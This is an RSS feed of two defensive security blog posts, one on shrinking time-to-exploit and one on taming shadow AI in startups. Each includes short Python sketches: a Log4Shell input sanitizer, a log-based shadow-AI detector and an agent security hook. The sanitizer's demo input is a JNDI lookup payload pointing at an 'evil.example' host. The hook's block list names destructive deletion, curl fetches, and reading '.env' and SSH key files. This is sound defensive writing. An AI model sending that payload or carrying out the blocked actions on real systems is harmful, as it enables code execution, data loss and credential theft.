<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mikail Kocak</title>
    <description>The latest articles on DEV Community by Mikail Kocak (@mikik).</description>
    <link>https://dev.to/mikik</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2495749%2F2ca9565b-1b52-45a9-9301-7adfbaa4d59d.png</url>
      <title>DEV Community: Mikail Kocak</title>
      <link>https://dev.to/mikik</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mikik"/>
    <language>en</language>
    <item>
      <title>Vulnerabilities are being exploited faster than ever: opportunity in disguise</title>
      <dc:creator>Mikail Kocak</dc:creator>
      <pubDate>Tue, 07 Apr 2026 08:31:35 +0000</pubDate>
      <link>https://dev.to/mikik/vulnerabities-are-being-exploited-faster-than-ever-opportunity-in-disguise-ki7</link>
      <guid>https://dev.to/mikik/vulnerabities-are-being-exploited-faster-than-ever-opportunity-in-disguise-ki7</guid>
      <description>&lt;p&gt;The &lt;a href="https://zerodayclock.com/" rel="noopener noreferrer"&gt;Zero Day Clock&lt;/a&gt; is now at 1.0d TTE (Time-to-Exploit), meaning vulnerabilities are getting &lt;strong&gt;exploited within 1 day on average. 50% of vulnerabilities are exploited within 17 hours&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://zerodayclock.com/" rel="noopener noreferrer"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foa1w0ifmf1ffyzfdpom9.png" alt="Chart showing TTE (Time-to-Exploit) going from 2.3 years in 2018 to 1.0 days in 2026" width="800" height="530"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: &lt;a href="https://zerodayclock.com/" rel="noopener noreferrer"&gt;https://zerodayclock.com/&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;That's a crazy time for cybersecurity! On one hand we have TTE approaching zero, and on the other hand we are actively throttling dependency updates in our software due to the increased risk of supply-chain attacks (or as PyPI puts it: &lt;a href="https://blog.pypi.org/posts/2026-04-02-incident-report-litellm-telnyx-supply-chain-attack/#:~:text=drinking%20from%20the%20firehose" rel="noopener noreferrer"&gt;we are no longer drinking from the firehose&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;So we have three problems:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;We need to patch CVEs faster, but unlike attackers, moving fast is risky for us: one bad patch or one botched live patch can cause downtime or lock out legitimate users. Unlike attackers, we have something to lose, and we have processes to follow.&lt;/li&gt;
&lt;li&gt;We need to slow down updates due to increased risk of supply-chain attacks&lt;/li&gt;
&lt;li&gt;And at the same time, the volume of new CVEs is increasing alarmingly&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is an interesting dilemma. This is something that traditional processes cannot handle efficiently and requires increased automation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1g58btx5v3tuz27o7bir.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1g58btx5v3tuz27o7bir.jpg" alt="Meme showing two buttons being hit at the same time by a man looking happy, one that button that says " width="350" height="530"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Rather than panic, we can treat TTE approaching zero as an opportunity. Solid defenses (zero trust, defense in depth, WAFs, API gateways, and defensive programming) need to be a must, not a nice-to-have. Defensive programming is especially powerful. Take Log4Shell: how could you have prevented it from being exploited in &lt;strong&gt;your&lt;/strong&gt; application?&lt;/p&gt;
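&lt;p&gt;As a minimal, hedged sketch of what defensive programming can look like in the Log4Shell case: that exploit relied on attacker-controlled strings reaching the logger, so one extra layer is to neutralize lookup-style patterns in untrusted input before it is ever logged. Function names and limits below are illustrative, not a specific library's API.&lt;/p&gt;

```python
import re

# Pattern matching the "${...}" lookup syntax abused by Log4Shell
# (CVE-2021-44228); names and thresholds here are illustrative.
LOOKUP_PATTERN = re.compile(r"\$\{[^}]*\}")

def sanitize_log_input(value: str, max_len: int = 1024) -> str:
    """Defensively neutralize untrusted input before logging it."""
    value = value[:max_len]                          # bound the size
    value = LOOKUP_PATTERN.sub("[redacted]", value)  # strip lookup syntax
    # Drop non-printable characters that could forge extra log lines
    return "".join(ch for ch in value if ch.isprintable())

print(sanitize_log_input("user-agent: ${jndi:ldap://evil.example/a}"))
# prints: user-agent: [redacted]
```

&lt;p&gt;The point isn't this exact filter: it's that a small validation layer between untrusted input and a powerful sink buys you time when the next CVE drops.&lt;/p&gt;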

&lt;p&gt;With these defenses in place, you are on the right side of the TTE curve: the next CVE won't become a disaster, it will be an opportunity, because fast exploits are fast feedback. That speed lets you quickly verify where your defenses are working well and where they need to be reinforced.&lt;/p&gt;

&lt;p&gt;This is the new reality for defenders. TTE is shrinking, but with the right defenses, it becomes a tool, not just a threat.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fast exploits = opportunity to validate defenses&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>vulnerabilities</category>
    </item>
    <item>
      <title>Controlling AI Sprawl in a Startup Environment</title>
      <dc:creator>Mikail Kocak</dc:creator>
      <pubDate>Wed, 25 Feb 2026 18:13:07 +0000</pubDate>
      <link>https://dev.to/mikik/controlling-ai-sprawl-in-a-startup-environment-3bdb</link>
      <guid>https://dev.to/mikik/controlling-ai-sprawl-in-a-startup-environment-3bdb</guid>
      <description>&lt;p&gt;You have probably felt it: new AI tools are constantly popping up, engineers experiment with running multiple agents concurrently, and the marketing team is using yet other tools.&lt;/p&gt;

&lt;p&gt;It can feel overwhelming, even impossible, especially in a startup or small business with limited budget and resources. Meanwhile, the AI space is evolving &lt;strong&gt;fast&lt;/strong&gt; while security teams are left in the dust.&lt;/p&gt;

&lt;p&gt;You might even think:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"If companies 10x or 50x bigger than mine are struggling, how can my startup even have a chance?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;You are not behind, you are not failing, you aren't alone, and company size doesn't matter.&lt;/p&gt;

&lt;p&gt;Worry shows up when we believe we have &lt;strong&gt;no control&lt;/strong&gt; over the outcome. So ask yourself: "how do I gain control?" This is an incremental process; you don't need perfection.&lt;/p&gt;

&lt;p&gt;In this article, I'll share what I have learned about taming what I call AI sprawl, without burning out you or your team, and, importantly, without stopping innovation.&lt;/p&gt;

&lt;p&gt;So let's see how you can surf the AI wave!&lt;/p&gt;

&lt;h2&gt;
  
  
  The Challenges
&lt;/h2&gt;

&lt;p&gt;First of all, let's take a look at the key issues startups and small businesses are facing:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Shadow AI - if you know the term "shadow IT", this will sound familiar: it is the use of unsanctioned AI tools inside the organization: AI providers, chatbots, local models, tools, extensions, skills, MCPs, agents, etc.&lt;/p&gt;

&lt;p&gt;The ecosystem is constantly expanding, and new tools appear faster than policies can be written; that speed can feel intimidating. But speed itself isn't the enemy, the lack of visibility is.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Shadow Cloud - Shadow AI rarely exists alone, it's connected with unsanctioned Cloud storage (OneDrive, Proton Drive, Google Drive, …), personal Cloud Computing accounts (AWS, GCP, Azure), SaaS platforms (Notion, Grammarly, etc.), personal VPS or Cloud Compute instances.&lt;/p&gt;

&lt;p&gt;Most of the time this isn't malicious, it's about convenience. But it creates blind spots: we don't know what data is leaving our environments, credentials are stored in unknown systems, and security is never reviewed. It's a black box. The issue isn't experimentation, it's unchecked experimentation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The visibility problem - when Shadow AI and Shadow Cloud expand unchecked, the organization starts losing situational awareness. You don't know where the data is flowing to, what or who is processing it, what is connected to what.&lt;/p&gt;

&lt;p&gt;All this uncertainty is very dangerous.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The startup culture (this is not a bug!) - startups are full of builders and enthusiastic people: they experiment, they optimize, they automate. Security losing sleep over innovation is a sign of growth and not failure.&lt;br&gt;
And what's most important: security must be an enabler, not a blocker.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There are so many tools, so much stuff. It's hard to know what to focus on.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Constrained resources - startups have a very limited number of people, little time, and a tight budget. That's normal, and it's part of the fun of startups.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Agentic systems are junior employees at machine speed: they make decisions, call APIs, trigger workflows, and modify data very quickly.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
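&lt;p&gt;To make the visibility problem concrete, here is a minimal, hypothetical sketch of regaining some situational awareness from data you may already have: matching egress (proxy or DNS) logs against known AI provider domains. The log format and domain list below are illustrative, not exhaustive.&lt;/p&gt;

```python
# Hypothetical sketch: surface possible shadow-AI use from egress logs.
# The domain list and log format are illustrative, not exhaustive.
KNOWN_AI_DOMAINS = {
    "api.openai.com",
    "api.anthropic.com",
    "generativelanguage.googleapis.com",
}

def flag_shadow_ai(log_lines):
    """Return the set of known AI domains seen in proxy/DNS log lines.

    Assumes each line is 'timestamp user domain', one request per line.
    """
    seen = set()
    for line in log_lines:
        parts = line.split()
        if len(parts) == 3 and parts[2] in KNOWN_AI_DOMAINS:
            seen.add(parts[2])
    return seen

logs = [
    "2026-02-25T10:00:01 alice api.openai.com",
    "2026-02-25T10:00:02 bob internal.example.com",
]
print(flag_shadow_ai(logs))  # prints: {'api.openai.com'}
```

&lt;p&gt;Even a crude inventory like this turns "we have no idea" into a starting point for the conversations in the next step.&lt;/p&gt;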

&lt;p&gt;Now, the question is: what do we actually do? Controlling AI sprawl isn't about building a fortress overnight but rather about gradually regaining control, empowering your employees, and creating safe and flexible guardrails.&lt;/p&gt;

&lt;p&gt;I recommend a four-step approach:&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 1: Talk.
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4wy4d2w8odhh3jbfqxik.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4wy4d2w8odhh3jbfqxik.jpg" alt="'Ancient aliens' meme with the caption saying only one word: " width="534" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The first step can be summed by one word: &lt;strong&gt;talk&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Your objective is not to restrict employees or slow down innovation, but to understand &lt;strong&gt;why&lt;/strong&gt; they are using these tools and how you can create a safe environment together. You might also be surprised by the ideas and solutions the teams already have.&lt;/p&gt;

&lt;p&gt;This is critical for three main reasons:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;  Trust - you are engaging, and you are demonstrating that you are an ally. Without trust, employees may try to bypass the controls you implement, which defeats the purpose.&lt;/li&gt;
&lt;li&gt;  Insights - you will understand what tools people are using, why they use multiple tools, and which workflows are critical. Document these insights, but remember that AI is evolving quickly, so this needs to be a living document.&lt;/li&gt;
&lt;li&gt;  Champions &amp;amp; Feedback lines - you are indirectly establishing feedback lines, and at the same time you can identify potential AI security champions. Look for employees who are passionate about AI safety: they can become your "Safe AI Use Committee", the champions who help you build and iterate on a robust AI security program.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Some employees can be pretty passionate about AI, you might get surprises!&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 2: Governance
&lt;/h2&gt;

&lt;p&gt;Once you understand the landscape, you can start building policies. Policies are one of the most powerful tools: they are low-cost and flexible.&lt;/p&gt;

&lt;p&gt;Focus on directives rather than technical controls: implementing controls at this stage is time-consuming, costly, and makes it harder to experiment. Most importantly, directives let you reduce risks &lt;strong&gt;quickly&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;To start, &lt;strong&gt;perform a simple risk assessment&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What are the key risks?&lt;/li&gt;
&lt;li&gt;How could they materialize?&lt;/li&gt;
&lt;li&gt;What's the impact?&lt;/li&gt;
&lt;li&gt;What directives can reduce the likelihood and severity?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Engage your AI enthusiasts in this step, they often have insights that will make policies more practical and easier to adopt.&lt;/p&gt;

&lt;p&gt;Finally, &lt;strong&gt;define metrics&lt;/strong&gt; to track the effectiveness of your policies and monitor risk levels over time.&lt;/p&gt;
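&lt;p&gt;For instance, one such metric could be the share of observed AI usage that flows through sanctioned accounts, tracked month over month. A toy sketch (all numbers made up):&lt;/p&gt;

```python
# Illustrative metric: share of observed AI-tool usage going through
# sanctioned accounts, tracked per month. All numbers are made up.
observations = {
    "2026-01": {"sanctioned": 40, "total": 100},
    "2026-02": {"sanctioned": 70, "total": 110},
}

def sanctioned_ratio(month):
    """Fraction of AI-tool usage through sanctioned accounts, 0.0 to 1.0."""
    o = observations[month]
    return round(o["sanctioned"] / o["total"], 2)

for month in sorted(observations):
    print(month, sanctioned_ratio(month))
```

&lt;p&gt;A rising ratio suggests the policy is being adopted; a flat or falling one is a signal to go back to step 1 and talk.&lt;/p&gt;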

&lt;h2&gt;
  
  
  Step 3: Keep Monitoring &amp;amp; Iterating
&lt;/h2&gt;

&lt;p&gt;Now, once you have the policies, you need to keep monitoring and keep iterating using the metrics you defined.&lt;/p&gt;

&lt;p&gt;Remember: policies aren’t "set and forget".&lt;/p&gt;

&lt;p&gt;Also, keep your feedback lines open: regularly check in with team leads, employees with influence, and your champions.&lt;/p&gt;

&lt;p&gt;Again: talk is your greatest tool; it builds trust and ensures employees see you as an enabler, not a blocker.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 4: Technical Controls
&lt;/h2&gt;

&lt;p&gt;Once you have a solid and stable foundation, you can start investing in technical controls. These tools help enforce your policies at scale and further reduce (or even eliminate) the identified risks.&lt;/p&gt;

&lt;p&gt;For example, startups may consider:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EDR/XDR - for example Wazuh if you are on a tight budget.&lt;/li&gt;
&lt;li&gt;Purchasing enterprise plans for AI tools such as Claude, they give you a lot of control.&lt;/li&gt;
&lt;li&gt;Use scanning tools for things like MCPs, AI skills, models, etc. - for example companies like Socket and Snyk are creating amazing (and open-source) tools around AI: use them.&lt;/li&gt;
&lt;li&gt;Use custom AI configurations - for example, the &lt;code&gt;~/.claude&lt;/code&gt; folder lets you manage global settings, and you can create custom security hooks, AI skills focused on security, etc.&lt;/li&gt;
&lt;/ul&gt;
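&lt;p&gt;On that last point, here is a hedged sketch of what a pre-tool-use security hook could look like. It assumes the agent pipes the proposed tool call as JSON to the hook's stdin and treats a non-zero exit code as "block"; the blocklist and event shape are illustrative, so check your tool's hook documentation for the exact contract.&lt;/p&gt;

```python
import io
import json
import sys

BLOCKED_SUBSTRINGS = ("rm -rf", "curl http", ".env", "id_rsa")  # illustrative

def check_event(stream) -> int:
    """Return 0 to allow the tool call, 2 to block it.

    Assumes the agent pipes the proposed call as JSON on the given stream
    (sys.stdin in a real hook) and treats a non-zero exit as a block.
    """
    event = json.load(stream)
    command = str(event.get("tool_input", {}).get("command", ""))
    for needle in BLOCKED_SUBSTRINGS:
        if needle in command:
            print(f"Blocked: contains '{needle}'", file=sys.stderr)
            return 2
    return 0

# Demo with an in-memory event; a real hook script would end with:
#   sys.exit(check_event(sys.stdin))
demo = io.StringIO(json.dumps({"tool_input": {"command": "rm -rf /"}}))
print(check_event(demo))  # prints 2 after the warning on stderr
```

&lt;p&gt;Substring matching is crude on purpose: the value is that the guardrail is yours, versioned, and easy to extend as your policies evolve.&lt;/p&gt;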




&lt;p&gt;So, remember: this is a leadership moment. If you approach AI with fear, you will burn out. Instead, approach it with curiosity.&lt;/p&gt;

&lt;p&gt;Your friends are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Talk&lt;/li&gt;
&lt;li&gt;Governance&lt;/li&gt;
&lt;li&gt;Your colleagues and champions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And lastly: size doesn't matter. You don't need to be a tech giant to tame AI.&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
